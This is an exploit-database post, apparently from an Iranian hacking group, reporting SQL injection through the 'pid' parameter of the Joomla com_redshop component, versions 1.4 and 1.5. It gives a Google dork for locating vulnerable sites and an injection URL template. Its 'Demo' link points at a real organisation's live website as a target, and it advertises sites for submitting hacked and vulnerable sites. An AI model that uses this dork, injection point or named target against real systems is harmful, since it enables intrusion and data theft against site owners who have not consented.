Joomla Redshop component versions 1.4 and 1.5 suffer from a remote SQL injection vulnerability.
7bce940bba1c54337da78e867025227f7e701372484e0d4567c3ea084407f9f1
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# Joomla Component com_redshop - 'Pid' Parameter Sql Injection Vulnerability
# Google Dork: inurl:index.php?option=com_redshop
# Date : 19/2/2017
# version : 1.4 and 1.5
# Category: Webapps
# Tested on: Windows
# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)
# Site : IeDb.Ir - irist.ir - xssed.Ir
# Iedb Telegram : https://telegram.me/iedbteam
# Archive Exploit = http://iedb.ir/exploits-6914.html
#####################################
Bug :
http://localhost/[PATH]/index.php?option=com_redshop&view=product&pid=[sql]&cid=1
Demo :
https://www.ncvo.org.uk/legals/10-content/index.php?option=com_redshop&view=product&pid=[sql]67&cid=19
#####################################
** http://iedb.ir ==>> Iranian Exploit DataBase And Iranian Security Team
** http://irist.ir ==>> submit hacked sites
** http://xssed.Ir ==>> Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)
Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,
Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team
#####################################
# Archive Exploit = http://iedb.ir/exploits-6914.html
#####################################